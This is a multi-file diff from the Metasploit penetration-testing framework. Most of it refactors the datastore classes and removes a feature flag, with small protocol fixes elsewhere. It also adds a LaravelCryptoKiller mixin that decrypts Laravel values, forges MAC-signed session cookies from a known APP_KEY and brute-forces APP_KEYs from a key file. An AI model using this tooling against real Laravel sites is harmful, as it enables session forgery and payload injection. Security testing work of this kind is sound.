-  # Initializes the data store's internal state.
-  #
-  def initialize
-    @options     = Hash.new
-    @aliases     = Hash.new
-
-    # default values which will be referenced when not defined by the user
-    @defaults = Hash.new
-
-    # values explicitly defined, which take precedence over default values
-    @user_defined = Hash.new
-  end
-
-  # @return [Hash{String => Msf::OptBase}] The options associated with this datastore. Used for validating values/defaults/etc
-  attr_accessor :options
-
-  #
-  # Returns a hash of user-defined datastore values. The returned hash does
-  # not include default option values.
-  #
-  # @return [Hash<String, Object>] values explicitly defined on the data store which will override any default datastore values
-  attr_accessor :user_defined
-
-  #
-  # Was this entry actually set or just using its default
-  #
-  # @return [TrueClass, FalseClass]
-  def default?(key)
-    search_for(key).default?
-  end
-
-  #
-  # Clears the imported flag for the supplied key since it's being set
-  # directly.
-  #
-  def []=(k, v)
-    k = find_key_case(k)
-
-    opt = @options[k]
-    unless opt.nil?
-      if opt.validate_on_assignment?
-        unless opt.valid?(v, check_empty: false)
-          raise Msf::OptionValidateError.new(["Value '#{v}' is not valid for option '#{k}'"])
-        end
-        v = opt.normalize(v)
-      end
-    end
-
-    @user_defined[k] = v
-  end
-
-  #
-  # Case-insensitive wrapper around hash lookup
-  #
-  def [](k)
-    search_result = search_for(k)
-
-    search_result.value
-  end
-
-  #
-  # Case-insensitive wrapper around store; Skips option validation entirely
-  #
-  def store(k,v)
-    @user_defined[find_key_case(k)] = v
-  end
-
-  #
-  # Updates a value in the datastore with the specified name, k, to the
-  # specified value, v. Skips option validation entirely.
-  #
-  def update_value(k, v)
-    store(k, v)
-  end
-
-  #
-  # unset the current key from the datastore
-  # @param [String] key The key to search for
-  def unset(key)
-    k = find_key_case(key)
-    search_result = search_for(k)
-    @user_defined.delete(k)
-
-    search_result.value
-  end
-
-  # @deprecated use #{unset} instead, or set the value explicitly to nil
-  # @param [String] key The key to search for
-  def delete(key)
-    unset(key)
-  end
-
-  #
-  # Removes an option and any associated value
-  #
-  # @param [String] name the option name
-  # @return [nil]
-  def remove_option(name)
-    k = find_key_case(name)
-    @user_defined.delete(k)
-    @aliases.delete_if { |_, v| v.casecmp?(k) }
-    @options.delete_if { |option_name, _v| option_name.casecmp?(k) || option_name.casecmp?(name) }
-
-    nil
-  end
-
-  #
-  # This method is a helper method that imports the default value for
-  # all of the supplied options
-  #
-  def import_options(options, imported_by = nil, overwrite = true)
-    options.each_option do |name, option|
-      if self.options[name].nil? || overwrite
-        key = name
-        option.aliases.each do |a|
-          @aliases[a.downcase] = key.downcase
-        end
-        @options[key] = option
-      end
-    end
-  end
-
-  #
-  # Imports option values from a whitespace separated string in
-  # VAR=VAL format.
-  #
-  def import_options_from_s(option_str, delim = nil)
-    hash = {}
-
-    # Figure out the delimiter, default to space.
-    if (delim.nil?)
-      delim = /\s/
-
-      if (option_str.split('=').length <= 2 or option_str.index(',') != nil)
-        delim = ','
-      end
-    end
-
-    # Split on the delimiter
-    option_str.split(delim).each { |opt|
-      var, val = opt.split('=', 2)
-
-      next if (var =~ /^\s+$/)
-
-
-      # Invalid parse?  Raise an exception and let those bastards know.
-      if (var == nil or val == nil)
-        var = "unknown" if (!var)
-
-        raise Rex::ArgumentParseError, "Invalid option specified: #{var}",
-          caller
-      end
-
-      # Remove trailing whitespaces from the value
-      val.gsub!(/\s+$/, '')
-
-      # Store the value
-      hash[var] = val
-    }
-
-    merge!(hash)
-  end
-
-  #
-  # Imports values from a hash and stores them in the datastore.
-  #
-  # @deprecated use {#merge!} instead
-  # @return [nil]
-  def import_options_from_hash(option_hash, imported = true, imported_by = nil)
-    merge!(option_hash)
-  end
-
-  # Update defaults from a hash. These merged values are not validated by default.
-  #
-  # @param [Hash<String, Object>] hash The default values that should be used by the datastore
-  # @param [Object] imported_by Who imported the defaults, not currently used
-  # @return [nil]
-  def import_defaults_from_hash(hash, imported_by:)
-    @defaults.merge!(hash)
-  end
-
-  # TODO: Doesn't normalize data in the same vein as:
-  # https://github.com/rapid7/metasploit-framework/pull/6644
-  # @deprecated Use {#import_options}
-  def import_option(key, val, imported = true, imported_by = nil, option = nil)
-    store(key, val)
-
-    if option
-      option.aliases.each do |a|
-        @aliases[a.downcase] = key.downcase
-      end
-    end
-    @options[key] = option
-  end
-
-  # @return [Array<String>] The array of user defined datastore values, and registered option names
-  def keys
-    (@user_defined.keys + @options.keys).uniq(&:downcase)
-  end
-
-  # @return [Integer] The length of the registered keys
-  def length
-    keys.length
-  end
-
-  alias count length
-  alias size length
-
-  # @param [String] key
-  # @return [TrueClass, FalseClass] True if the key is present in the user defined values, or within registered options. False otherwise.
-  def key?(key)
-    matching_key = find_key_case(key)
-    keys.include?(matching_key)
-  end
-
-  alias has_key? key?
-  alias include? key?
-  alias member? key?
-
-  #
-  # Serializes the options in the datastore to a string.
-  #
-  def to_s(delim = ' ')
-    str = ''
-
-    keys.sort.each { |key|
-      str << "#{key}=#{self[key]}" + ((str.length) ? delim : '')
-    }
-
-    str
-  end
-
-  # Override Hash's to_h method so we can include the original case of each key
-  # (failing to do this breaks a number of places in framework and pro that use
-  # serialized datastores)
-  def to_h
-    datastore_hash = {}
-    self.keys.each do |k|
-      datastore_hash[k.to_s] = self[k].to_s
-    end
-    datastore_hash
-  end
-
-  # Hack on a hack for the external modules
-  def to_external_message_h
-    datastore_hash = {}
-
-    array_nester = ->(arr) do
-      if arr.first.is_a? Array
-        arr.map &array_nester
-      else
-        arr.map { |item| item.to_s.dup.force_encoding('UTF-8') }
-      end
-    end
-
-    self.keys.each do |k|
-      # TODO arbitrary depth
-      if self[k].is_a? Array
-        datastore_hash[k.to_s.dup.force_encoding('UTF-8')] = array_nester.call(self[k])
-      else
-        datastore_hash[k.to_s.dup.force_encoding('UTF-8')] = self[k].to_s.dup.force_encoding('UTF-8')
-      end
-    end
-    datastore_hash
-  end
-
-  #
-  # Persists the contents of the data store to a file
-  #
-  def to_file(path, name = 'global')
-    ini = Rex::Parser::Ini.new(path)
-
-    ini.add_group(name)
-
-    # Save all user-defined options to the file.
-    @user_defined.each_pair { |k, v|
-      ini[name][k] = v
-    }
-
-    ini.to_file(path)
-  end
-
-  #
-  # Imports datastore values from the specified file path using the supplied
-  # name
-  #
-  def from_file(path, name = 'global')
-    begin
-      ini = Rex::Parser::Ini.from_file(path)
-    rescue
-      return
-    end
-
-    if ini.group?(name)
-      merge!(ini[name])
-    end
-  end
-
-  #
-  # Return a copy of this datastore. Only string values will be duplicated, other values
-  # will share the same reference
-  # @return [Msf::DataStore] a new datastore instance
-  def copy
-    new_instance = self.class.new
-    new_instance.copy_state(self)
-    new_instance
-  end
-
-  #
-  # Merge the other object into the current datastore's aliases and imported hashes
-  #
-  # @param [Msf::Datastore, Hash] other
-  def merge!(other)
-    if other.is_a?(DataStoreWithFallbacks)
-      self.aliases.merge!(other.aliases)
-      self.options.merge!(other.options)
-      self.defaults.merge!(other.defaults)
-      other.user_defined.each do |k, v|
-        @user_defined[find_key_case(k)] = v
-      end
-    else
-      other.each do |k, v|
-        self.store(k, v)
-      end
-    end
-
-    self
-  end
-
-  alias update merge!
-
-  #
-  # Reverse Merge the other object into the current datastore's aliases and imported hashes
-  # Equivalent to ActiveSupport's reverse_merge! functionality.
-  #
-  # @param [Msf::Datastore] other
-  def reverse_merge!(other)
-    raise ArgumentError, "invalid error type #{other.class}, expected ::Msf::DataStore" unless other.is_a?(Msf::DataStoreWithFallbacks)
-
-    copy_state(other.merge(self))
-  end
-
-  #
-  # Override merge to ensure we merge the aliases and imported hashes
-  #
-  # @param [Msf::Datastore,Hash] other
-  def merge(other)
-    ds = self.copy
-    ds.merge!(other)
-  end
-
-  #
-  # Completely clear all values in the data store
-  #
-  def clear
-    self.options.clear
-    self.aliases.clear
-    self.defaults.clear
-    self.user_defined.clear
-
-    self
-  end
-
-  #
-  # Overrides the builtin 'each' operator to avoid the following exception on Ruby 1.9.2+
-  #    "can't add a new key into hash during iteration"
-  #
-  def each(&block)
-    list = []
-    self.keys.sort.each do |sidx|
-      list << [sidx, self[sidx]]
-    end
-    list.each(&block)
-  end
-
-  alias each_pair each
-
-  def each_key(&block)
-    self.keys.each(&block)
-  end
-
-  #
-  # Case-insensitive key lookup
-  #
-  # @return [String]
-  def find_key_case(k)
-    # Scan each alias looking for a key
-    search_k = k.downcase
-    if self.aliases.has_key?(search_k)
-      search_k = self.aliases[search_k]
-    end
-
-    # Check to see if we have an exact key match - otherwise we'll have to search manually to check case sensitivity
-    if @user_defined.key?(search_k) || options.key?(search_k)
-      return search_k
-    end
-
-    # Scan each key looking for a match
-    each_key do |rk|
-      if rk.casecmp(search_k) == 0
-        return rk
-      end
-    end
-
-    # Fall through to the non-existent value
-    k
-  end
-
-  # Search for a value within the current datastore, taking into consideration any registered aliases, fallbacks, etc.
-  #
-  # @param [String] key The key to search for
-  # @return [DataStoreSearchResult]
-  def search_for(key)
-    k = find_key_case(key)
-    return search_result(:user_defined, @user_defined[k]) if @user_defined.key?(k)
-
-    option = @options.fetch(k) { @options.find { |option_name, _option| option_name.casecmp?(k) }&.last }
-    if option
-      # If the key isn't present - check any additional fallbacks that have been registered with the option.
-      # i.e. handling the scenario of SMBUser not being explicitly set, but the option has registered a more
-      # generic 'Username' fallback
-      option.fallbacks.each do |fallback|
-      fallback_search = search_for(fallback)
-        if fallback_search.found?
-          return search_result(:option_fallback, fallback_search.value, fallback_key: fallback)
-        end
-      end
-    end
-
-    # Checking for imported default values, ignoring case again
-    imported_default_match = @defaults.find { |default_key, _default_value| default_key.casecmp?(k) }
-    return search_result(:imported_default, imported_default_match.last) if imported_default_match
-    return search_result(:option_default, option.default) if option
-
-    search_result(:not_found, nil)
-  end
-
-  protected
-
-  # These defaults will be used if the user has not explicitly defined a specific datastore value.
-  # These will be checked as a priority to any options that also provide defaults.
-  #
-  # @return [Hash{String => Msf::OptBase}] The hash of default values
-  attr_accessor :defaults
-
-  # @return [Hash{String => String}] The key is the old option name, the value is the new option name
-  attr_accessor :aliases
-
-  #
-  # Copy the state from the other Msf::DataStore. The state will be coped in a shallow fashion, other than
-  # imported and user_defined strings.
-  #
-  # @param [Msf::DataStore] other The other datastore to copy state from
-  # @return [Msf::DataStore] the current datastore instance
-  def copy_state(other)
-    self.options = other.options.dup
-    self.aliases = other.aliases.dup
-    self.defaults = other.defaults.transform_values { |value| value.kind_of?(String) ? value.dup : value }
-    self.user_defined = other.user_defined.transform_values { |value| value.kind_of?(String) ? value.dup : value }
-
-    self
-  end
-
-  # Raised when the specified key is not found
-  # @param [string] key
-  def key_error_for(key)
-    ::KeyError.new "key not found: #{key.inspect}"
-  end
-
-  #
-  # Simple dataclass for storing the result of a datastore search
-  #
-  class DataStoreSearchResult
-    # @return [String, nil] the key associated with the fallback value
-    attr_reader :fallback_key
-
-    # @return [object, nil] The value if found
-    attr_reader :value
-
-    def initialize(result, value, namespace: nil, fallback_key: nil)
-      @namespace = namespace
-      @result = result
-      @value = value
-      @fallback_key = fallback_key
-    end
-
-    def default?
-      result == :imported_default || result == :option_default || !found?
-    end
-
-    def found?
-      result != :not_found
-    end
-
-    def fallback?
-      result == :option_fallback
-    end
-
-    def global?
-      namespace == :global_data_store && found?
-    end
-
-  protected
-
-    # @return [Symbol] namespace Where the search result was found, i.e. a module datastore or global datastore
-    attr_reader :namespace
-
-    # @return [Symbol] result is one of `user_defined`, `not_found`, `option_fallback`, `option_default`, `imported_default`
-    attr_reader :result
-  end
-
-  def search_result(result, value, fallback_key: nil)
-    DataStoreSearchResult.new(result, value, namespace: :global_data_store, fallback_key: fallback_key)
-  end
-end
-
-end
@@ -48,6 +48,7 @@ module Msf::DBManager::Service
  # +:info+:: Detailed information about the service such as name and version information
  # +:state+:: The current listening state of the service (one of: open, closed, filtered, unknown)
  #
+  # @return [Mdm::Service,nil]
  def report_service(opts)
    return if !active
  ::ApplicationRecord.connection_pool.with_connection { |conn|
@@ -81,8 +82,6 @@ module Msf::DBManager::Service
      return nil
    end

-    ret  = {}
-
    proto = opts[:proto] || Msf::DBManager::DEFAULT_SERVICE_PROTO

    service = host.services.where(port: opts[:port].to_i, proto: proto).first_or_initialize
@@ -116,13 +115,13 @@ module Msf::DBManager::Service
    end

    if opts[:task]
-      Mdm::TaskService.create(
+      Mdm::TaskService.where(
          :task => opts[:task],
          :service => service
-      )
+      ).first_or_create
    end

-    ret[:service] = service
+    service
  }
  end

@@ -223,6 +223,10 @@ module Msf::DBManager::Vuln
    # Set the exploited_at value if provided
    vuln.exploited_at = exploited_at if exploited_at

+    # Vuln origin ignored, rationale:
+    #   https://github.com/rapid7/metasploit-framework/pull/19817#issuecomment-2615656036
+    # vuln.origin = opts[:origin] if opts[:origin]
+
    # Merge the references
    if rids
      vuln.refs << (rids - vuln.refs)
@@ -0,0 +1,204 @@
+# -*- coding: binary -*-
+
+require 'cgi'
+
+###
+# This mixin module provides methods to exploit bad implementations of decryption mechanisms in Laravel applications.
+# This tool was firstly designed to craft payloads targeting the Laravel `decrypt()` function from the package `Illuminate\Encryption`.
+# It can also be used to decrypt any data encrypted via `encrypt()` or `encryptString()`.
+# The tool requires a valid `APP_KEY` to be used, you can also try to bruteforce them if you think there is a potential key reuse
+# from a public project for example.
+# Original authors of the tool: `@_remsio_` `@Kainx42` from SynActiv.
+# Orignal python code can be found here: https://github.com/synacktiv/laravel-crypto-killer
+# Recoded in Ruby by h00die-gr3y (h00die.gr3y[at]gmail.com)
+###
+module Msf::Exploit::LaravelCryptoKiller
+  # Check if cipher is valid
+  # @param [String] <cipher_mode>  The cipher_mode
+  #
+  # @return [Boolean] true if mode is ok or false if mode is not valid
+  def valid_cipher?(cipher_mode)
+    ciphers ||= OpenSSL::Cipher.ciphers
+    ciphers.include?(cipher_mode.downcase)
+  end
+
+  # Perform AES encryption in CBC mode (compatible with Laravel)
+  # @param [String] <value> The value that will be encrypted
+  # @param [String] <iv> The IV parameter used for encryption
+  # @param [String] <key> The key used for encryption
+  # @param [String] <cipher_mode> Cipher_mode used for encryption (AES-256-CBC)
+  #
+  # @return [String] The encrypted value or nil if unsuccessful
+  def aes_encrypt(value, iv, key, cipher_mode)
+    # Check cipher mode
+    unless valid_cipher?(cipher_mode)
+      vprint_error("Cipher is not valid: #{cipher_mode}")
+      return
+    end
+    # Create a new AES cipher in CBC mode
+    cipher = OpenSSL::Cipher.new(cipher_mode)
+    cipher.encrypt
+    cipher.key = key
+    cipher.iv = iv
+
+    # Padding (similar to the pad lambda in Python)
+    pad_length = 16 - (value.length % 16)
+    padded_value = value + (pad_length.chr * pad_length)
+
+    # Encrypt the data
+    cipher.update(padded_value)
+  rescue StandardError => e
+    vprint_error("AES encryption failed: #{e.message}")
+  end
+
+  # Perform AES decryption in CBC mode (compatible with Laravel)
+  # @param [String] <encrypted_value> Encrypted value that will be decrypted
+  # @param [String] <iv> Random 16-byte IV parameter used for encryption
+  # @param [String] <key> The key used for decryption
+  # @param [String] <cipher_mode> Cipher_mode used for encryption (AES-256-CBC)
+  #
+  # @return [String] The decrypted value or nil if unsuccessful
+  def aes_decrypt(encrypted_value, iv, key, cipher_mode)
+    # Check cipher mode
+    unless valid_cipher?(cipher_mode)
+      vprint_error("Cipher is not valid: #{cipher_mode}")
+      return
+    end
+    # Create AES cipher in CBC mode
+    cipher = OpenSSL::Cipher.new(cipher_mode)
+    cipher.decrypt
+    cipher.key = key
+    cipher.iv = iv
+
+    # Decrypt the value
+    cipher.update(encrypted_value) + cipher.final
+  rescue OpenSSL::Cipher::CipherError => e
+    vprint_error("AES decryption failed: #{e.message}")
+  end
+
+  # Encrypts a base64 string as a ciphered Laravel value
+  # @param [String] <value> The base64-encode value that will be encrypted
+  # @param [String] <key> The key used for decryption
+  # @param [String] <cipher_mode> Cipher_mode used for encryption (AES-256-CBC)
+  #
+  # @return [String] The base64-encoded encrypted JSON.
+  def laravel_encrypt(value_to_encrypt, key, cipher_mode)
+    key = retrieve_key(key)
+    iv = OpenSSL::Random.random_bytes(16) # Random 16-byte IV
+    tmp_bytes = Base64.strict_encode64(aes_encrypt(Base64.strict_decode64(value_to_encrypt), iv, key, cipher_mode))
+
+    # Base64-encode the IV
+    b64_iv = Base64.strict_encode64(iv).strip
+
+    # Prepare data for output
+    data = {
+      'iv' => b64_iv,
+      'value' => tmp_bytes.strip,
+      'mac' => generate_mac(key, b64_iv, tmp_bytes.strip),
+      'tag' => '' # Assuming empty tag
+    }
+    # Return the final encrypted value as Base64-encoded JSON
+    Base64.strict_encode64(data.to_json)
+  end
+
+  # Encrypts a base64 string as a Laravel session cookie.
+  # @param [String] <value_to_encrypt> The value that will be encrypted
+  # @param [String] <hash_value> The decrypted value of the Laravel session cookie
+  # @param [String] <key> The key used for decryption
+  # @param [String] <cipher_mode> Cipher_mode used for encryption (AES-256-CBC)
+  #
+  # @return [String] The base64-encoded encrypted Laravel session_cookie value
+  def laravel_encrypt_session_cookie(value_to_encrypt, hash_value, key, cipher_mode)
+    decoded_value = Base64.strict_decode64(value_to_encrypt).force_encoding('utf-8')
+    parsed_value = decoded_value.gsub('\\', '\\\\\\').gsub('"', '\\"').gsub(/\00/, '\\u0000')
+    session_json_to_encrypt = "#{hash_value}|{\"data\":\"#{parsed_value}\",\"expires\":9999999999}"
+    laravel_encrypt(Base64.strict_encode64(session_json_to_encrypt), key, cipher_mode)
+  end
+
+  # Parses Laravel cipher data
+  # @param [String] <laravel_cipher> The base64-encoded Laravel cipher data
+  #
+  # @return [String] The laravel parsed cipher data in JSON format or nil if unsuccessful
+  def parse_laravel_cipher(laravel_cipher)
+    laravel_cipher = CGI.unescape(laravel_cipher) # Decoding URL encoded string
+    begin
+      data = JSON.parse(Base64.strict_decode64(laravel_cipher))
+    rescue JSON::ParserError
+      vprint_error('The JSON inside your base64 is malformed')
+      return
+    rescue StandardError
+      vprint_error('Your base64 laravel_cipher value is malformed')
+      return
+    end
+
+    data['value'] = Base64.strict_decode64(data['value'])
+    data['iv'] = Base64.strict_decode64(data['iv'])
+    data
+  end
+
+  # Parse Laravel APP_KEY value
+  # @param [String] <key> The Laravel APP_KEY
+  #
+  # @return [String] The Laravel parsed APP_KEY
+  def retrieve_key(key)
+    if key.start_with?('base64:')
+      Base64.strict_decode64(key.split(':')[1])
+    elsif key.length == 44
+      Base64.strict_decode64(key)
+    else
+      key.encode('utf-8')
+    end
+  end
+
+  # Decrypts a Laravel ciphered string
+  # @param [String] <laravel_cipher> The Laravel cipher to be decrypted
+  # @param [String] <key> The key used for decryption
+  # @param [String] <cipher_mode> Cipher_mode used for encryption (AES-256-CBC)
+  #
+  # @return [String] The decrypted Laravel cipher or nil if unsuccessful
+  def laravel_decrypt(laravel_cipher, key, cipher_mode)
+    data = parse_laravel_cipher(laravel_cipher)
+    key = retrieve_key(key)
+
+    begin
+      return aes_decrypt(data['value'], data['iv'], key, cipher_mode)
+    rescue StandardError
+      vprint_error('Your key is probably malformed or incorrect.')
+    end
+  end
+
+  # Uses an opened file containing a key on each line to perform a brute-force attack on a given value
+  # @param [String] <value> The encrypted Laravel value
+  # @param [String] <key_file> The file with Laravel APP_KEYs per line used for brute-force decryption
+  # @param [String] <key> The key used for decryption
+  # @param [String] <cipher_mode> Cipher_mode used for encryption (AES-256-CBC)
+  #
+  # @return [String] The valid key if it was identified with the value: {"key":<key>, "value":<value>}
+  def laravel_bruteforce_from_file(value, key_file, cipher_mode)
+    if !File.file?(key_file)
+      return nil
+    end
+
+    File.foreach(key_file) do |line|
+      key = line.strip
+      decrypted_value = laravel_decrypt(value, key, cipher_mode).force_encoding('utf-8')
+      if decrypted_value
+        return { 'key' => key, 'value' => decrypted_value }
+      end
+    rescue StandardError
+      next
+    end
+
+    nil
+  end
+
+  # Generate HMAC with SHA256
+  # @param [String] <value> The value that will be encrypted
+  # @param [String] <iv> Random 16-byte IV parameter
+  # @param [String] <key> The key
+  #
+  # @return [String] The hmac digest.
+  def generate_mac(key, iv, value)
+    return OpenSSL::HMAC.hexdigest('SHA256', key, "#{iv}#{value}")
+  end
+end
@@ -52,11 +52,17 @@ module Server
      data = entries.split(';')
    end
    data.each do |entry|
-      next if entry.gsub(/\s/,'').empty?
-      addr, names = entry.split(' ', 2)
+      next if entry.gsub(/\s/, '').empty?
+
+      address, names = entry.split(' ', 2)
      names.split.each do |name|
-        name << '.' unless name[-1] == '.' or name == '*'
-        service.cache.add_static(name, addr, type)
+        name << '.' unless name.end_with?('.') || name == '*'
+
+        unless Rex::Socket.is_ip_addr?(address.to_s) && (name.to_s.match(MATCH_HOSTNAME) || name == '*')
+          raise "Invalid parameters for static entry - #{name}, #{address}, #{type}"
+        end
+
+        service.cache.cache_record(Dnsruby::RR.create(name: name, type: type, address: address), expire: false)
      end
    end
    service.cache.records.select {|r,e| e == 0}
@@ -235,7 +235,8 @@ module Exploit::Remote::HttpClient
  # @raise [Rex::Proto::Http::WebSocket::WebSocketError] raises an exception if the connection fails
  # @return [Rex::Proto::Http::WebSocket::Interface]
  def connect_ws(opts={}, timeout = 20)
-    ws_key = Rex::Text.rand_text_alphanumeric(20)
+    # As per the spec (RFC6455 Section 11.3.1), a Sec-WebSocket-Key is a 16 byte value that has been Base64 encoded.
+    ws_key = Rex::Text.encode_base64(SecureRandom.bytes(16))
    opts['headers'] = opts.fetch('headers', {}).merge({
      'Connection' => 'Upgrade',
      'Upgrade' => 'WebSocket',
@@ -1088,8 +1088,8 @@ class Msf::Exploit::Remote::Kerberos::ServiceAuthenticator::Base
      end

      unless !sname_hostname ||
-        sname_hostname.to_s.downcase == credential.server.components[1] ||
-        sname_hostname.to_s.downcase.ends_with?('.' + credential.server.components[1])
+          sname_hostname.to_s.downcase == credential.server.components[1].downcase ||
+          sname_hostname.to_s.downcase.ends_with?('.' + credential.server.components[1].downcase)
        wlog("Filtered credential #{file_path} ##{index} reason: SPN (#{sname_hostname}) hostname does not match (spn: #{credential.server.components.snapshot.join('/')})")
        next
      end
@@ -284,6 +284,14 @@ module Msf
            end
            normalized_attribute[0] = time_string
          when 66 # String (Nt Security Descriptor)
+            if attribute_property[:attributesyntax] == '2.5.5.15'
+              begin
+                sd = Rex::Proto::MsDtyp::MsDtypSecurityDescriptor.read(entry[attribute_name][0])
+                normalized_attribute[0] = sd.to_sddl_text(domain_sid: nil)
+              rescue StandardError => e
+                elog('failed to parse a binary security descriptor to SDDL', error: e)
+              end
+            end
          when 127 # Object
          else
            print_error("Unknown oMSyntax entry: #{attribute_property[:omsyntax]}")
@@ -54,12 +54,14 @@ module Msf
      case ntlm_message.ntlm_version
      when :ntlmv1, :ntlm2_session
        hash_type = 'NTLMv1-SSP'
+        jtr_format = Metasploit::Framework::Hashes::JTR_NTLMV1
        client_hash = "#{bin_to_hex(ntlm_message.lm_response)}:#{bin_to_hex(ntlm_message.ntlm_response)}"

        combined_hash << ":#{client_hash}"
        combined_hash << ":#{bin_to_hex(challenge)}"
      when :ntlmv2
        hash_type = 'NTLMv2-SSP'
+        jtr_format = Metasploit::Framework::Hashes::JTR_NTLMV2
        client_hash = "#{bin_to_hex(ntlm_message.ntlm_response[0...16])}:#{bin_to_hex(ntlm_message.ntlm_response[16..-1])}"

        combined_hash << ":#{bin_to_hex(challenge)}"
@@ -68,8 +70,6 @@ module Msf

      return if hash_type.nil?

-      jtr_format = ntlm_message.ntlm_version == :ntlmv1 ? Metasploit::Framework::Hashes::JTR_NTLMV1 : Metasploit::Framework::Hashes::JTR_NTLMV2
-
      if active_db?
        origin = create_credential_origin_service(
          {
@@ -15,7 +15,6 @@ module Msf

    CONFIG_KEY = 'framework/features'
    WRAPPED_TABLES = 'wrapped_tables'
-    DATASTORE_FALLBACKS = 'datastore_fallbacks'
    FULLY_INTERACTIVE_SHELLS = 'fully_interactive_shells'
    MANAGER_COMMANDS = 'manager_commands'
    METASPLOIT_PAYLOAD_WARNINGS = 'metasploit_payload_warnings'
@@ -49,13 +48,6 @@ module Msf
        default_value: false,
        developer_notes: 'Useful for developers, likely not to ever be useful for an average user'
      }.freeze,
-      {
-        name: DATASTORE_FALLBACKS,
-        description: 'When enabled you can consistently set username across modules, instead of setting SMBUser/FTPUser/BIND_DN/etc',
-        requires_restart: true,
-        default_value: true,
-        developer_notes: 'This functionality is enabled by default now, and the feature flag can be removed now'
-      }.freeze,
      {
        name: METASPLOIT_PAYLOAD_WARNINGS,
        description: 'When enabled Metasploit will output warnings about missing Metasploit payloads, for instance if they were removed by antivirus etc',
@@ -136,7 +136,7 @@ module Msf
      self.options.add_evasion_options(info['EvasionOptions'], self.class)

      # Create and initialize the data store for this module
-      self.datastore = ModuleDataStore.new(self)
+      self.datastore = Msf::ModuleDataStore.new(self)

      # Import default options into the datastore
      import_defaults
@@ -21,7 +21,7 @@ module Msf::Module::DataStore

    # If there are default options, import their values into the datastore
    if (module_info['DefaultOptions'])
-      if datastore.is_a?(Msf::DataStoreWithFallbacks)
+      if datastore.is_a?(Msf::DataStore)
        self.datastore.import_defaults_from_hash(module_info['DefaultOptions'], imported_by: 'import_defaults')
      else
        self.datastore.import_options_from_hash(module_info['DefaultOptions'], true, 'self')
@@ -38,7 +38,7 @@ module Msf::Module::DataStore
  def import_target_defaults
    return unless defined?(targets) && targets && target && target.default_options

-    if self.datastore.is_a?(Msf::ModuleDataStoreWithFallbacks)
+    if self.datastore.is_a?(Msf::ModuleDataStore)
      datastore.import_defaults_from_hash(target.default_options, imported_by: 'import_target_defaults')
    else
      datastore.import_options_from_hash(target.default_options, true, 'self')
@@ -30,7 +30,7 @@ module Msf::Module::Options
  def deregister_options(*names)
    names.each { |name|
      real_name = self.datastore.find_key_case(name)
-      if self.datastore.is_a?(Msf::DataStoreWithFallbacks)
+      if self.datastore.is_a?(Msf::DataStore)
        self.datastore.remove_option(name)
      else
        self.datastore.delete(name)
@@ -10,20 +10,7 @@ module Msf
  ###
  class ModuleDataStore < DataStore

-    # Temporary forking logic for conditionally using the {Msf::ModuleDatastoreWithFallbacks} implementation.
-    #
-    # This method replaces the default `ModuleDataStore.new` with the ability to instantiate the `ModuleDataStoreWithFallbacks`
-    # class instead, if the feature is enabled
-    def self.new(m)
-      if Msf::FeatureManager.instance.enabled?(Msf::FeatureManager::DATASTORE_FALLBACKS)
-        return Msf::ModuleDataStoreWithFallbacks.new(m)
-      end
-
-      instance = allocate
-      instance.send(:initialize, m)
-      instance
-    end
-
+    # @param [Msf::Module] m
    def initialize(m)
      super()

@@ -31,51 +18,63 @@ module Msf
    end

    #
-    # Fetch the key from the local hash first, or from the framework datastore
-    # if we can't directly find it
-    #
-    def fetch(key)
-      key = find_key_case(key)
-      val = nil
-      val = super if(@imported_by[key] != 'self')
-      if (val.nil? and @_module and @_module.framework)
-        val = @_module.framework.datastore[key]
-      end
-      val = super if val.nil?
-      val
-    end
-
-    #
-    # Same as fetch
-    #
-    def [](key)
-      key = find_key_case(key)
-      val = nil
-      val = super if(@imported_by[key] != 'self')
-      if (val.nil? and @_module and @_module.framework)
-        val = @_module.framework.datastore[key]
-      end
-      val = super if val.nil?
-      val
-    end
-
-    #
-    # Was this entry actually set or just using its default
-    #
-    def default?(key)
-      (@imported_by[key] == 'self')
-    end
-
-    #
-    # Return a deep copy of this datastore.
-    #
+    # Return a copy of this datastore. Only string values will be duplicated, other values
+    # will share the same reference
+    # @return [Msf::DataStore] a new datastore instance
    def copy
-      ds = self.class.new(@_module)
-      self.keys.each do |k|
-        ds.import_option(k, self[k].kind_of?(String) ? self[k].dup : self[k], @imported[k], @imported_by[k])
+      new_instance = self.class.new(@_module)
+      new_instance.copy_state(self)
+      new_instance
+    end
+
+    # Search for a value within the current datastore, taking into consideration any registered aliases, fallbacks, etc.
+    # If a value is not present in the current datastore, the global parent store will be referenced instead
+    #
+    # @param [String] key The key to search for
+    # @return [DataStoreSearchResult]
+    def search_for(key)
+      k = find_key_case(key)
+      return search_result(:user_defined, @user_defined[k]) if @user_defined.key?(k)
+
+      # Preference globally set values over a module's option default
+      framework_datastore_search = search_framework_datastore(key)
+      return framework_datastore_search if framework_datastore_search.found? && !framework_datastore_search.default?
+
+      option = @options.fetch(k) { @options.find { |option_name, _option| option_name.casecmp?(k) }&.last }
+      if option
+        # If the key isn't present - check any additional fallbacks that have been registered with the option.
+        # i.e. handling the scenario of SMBUser not being explicitly set, but the option has registered a more
+        # generic 'Username' fallback
+        option.fallbacks.each do |fallback|
+          fallback_search = search_for(fallback)
+          if fallback_search.found?
+            return search_result(:option_fallback, fallback_search.value, fallback_key: fallback)
+          end
+        end
      end
-      ds.aliases = self.aliases.dup
-      ds
+
+      # Checking for imported default values, ignoring case again TODO: add Alias test for this
+      imported_default_match = @defaults.find { |default_key, _default_value| default_key.casecmp?(k) }
+      return search_result(:imported_default, imported_default_match.last) if imported_default_match
+      return search_result(:option_default, option.default) if option
+
+      search_framework_datastore(k)
+    end
+
+    protected
+
+    # Search the framework datastore
+    #
+    # @param [String] key The key to search for
+    # @return [DataStoreSearchResult]
+    def search_framework_datastore(key)
+      return search_result(:not_found, nil) if @_module&.framework.nil?
+
+      @_module.framework.datastore.search_for(key)
+    end
+
+    def search_result(result, value, fallback_key: nil)
+      DataStoreSearchResult.new(result, value, namespace: :module_data_store, fallback_key: fallback_key)
    end
  end
 end
@@ -1,80 +0,0 @@
-# -*- coding: binary -*-
-module Msf
-
-  ###
-  #
-  # DataStore wrapper for modules that will attempt to back values against the
-  # framework's datastore if they aren't found in the module's datastore.  This
-  # is done to simulate global data store values.
-  #
-  ###
-  class ModuleDataStoreWithFallbacks < DataStoreWithFallbacks
-
-    # @param [Msf::Module] m
-    def initialize(m)
-      super()
-
-      @_module = m
-    end
-
-    #
-    # Return a copy of this datastore. Only string values will be duplicated, other values
-    # will share the same reference
-    # @return [Msf::DataStore] a new datastore instance
-    def copy
-      new_instance = self.class.new(@_module)
-      new_instance.copy_state(self)
